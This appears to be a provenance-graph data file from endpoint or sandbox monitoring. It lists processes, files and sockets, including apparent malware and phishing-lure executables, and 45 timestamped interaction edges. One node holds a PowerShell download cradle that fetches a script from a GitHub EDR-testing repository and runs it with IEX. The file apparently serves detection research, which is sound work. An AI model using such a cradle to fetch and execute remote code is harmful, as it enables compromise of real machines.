15
MP*-wbengine.exe
MF-\System32\notepad.exe
SO-https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt','Default_File_Path.ps1');IEX((-Join([IO.File]::ReadAllBytes('Default_File_Path.ps1')|ForEach-Object{[Char]$_
MF-\Users\admin\AppData\Local\Temp\nsf91FB.tmp\ns9DCC.tmp
TP*-468C.exe
MP*-snuvcdsm.exe 
SO-8.100.0.203
TF-C:\Users\Public\Videos\videotv.m3u
TP*-Group unlock - Linkvertise Downloader_LIT-Qg1.exe 
TF-C:\Users\admin\AppData\Local\Temp\bozon.exe
TP-MsBuild.exe
SF-C:\Windows\system32\WerFault
SF-C:\Program Files\Internet Explorer\iexplore.exe
TP-Order specification.exe
MP-findstr.exe
45
0 1 WR-1
2 0 RF-1
0 3 EX-1
0 4 IJ-1
4 1 RD-2
2 4 RF-2
4 3 RD-2
0 5 FR-1
5 1 WR-3
5 2 ST-3
5 3 RD-3
4 5 IJ-2
6 0 RF-1
4 6 ST-2
5 6 ST-3
0 7 WR-1
4 7 EX-2
5 7 CD-3
0 8 IJ-1
8 1 EX-4
2 8 RF-3
8 3 WR-4
4 8 IJ-2
5 8 IJ-3
6 8 RF-3
8 7 UK-4
0 9 WR-1
4 9 CD-2
5 9 CD-3
0 10 FR-1
10 1 RD-4
2 10 RF-3
10 3 WR-4
4 10 IJ-2
5 10 UK-3
4 11 WR-2
4 12 UK-2
13 3 WR-4
13 6 ST-4
13 9 WR-4
13 11 WR-4
6 14 RF-3
14 9 EX-4
14 11 WR-4
13 14 UK-4

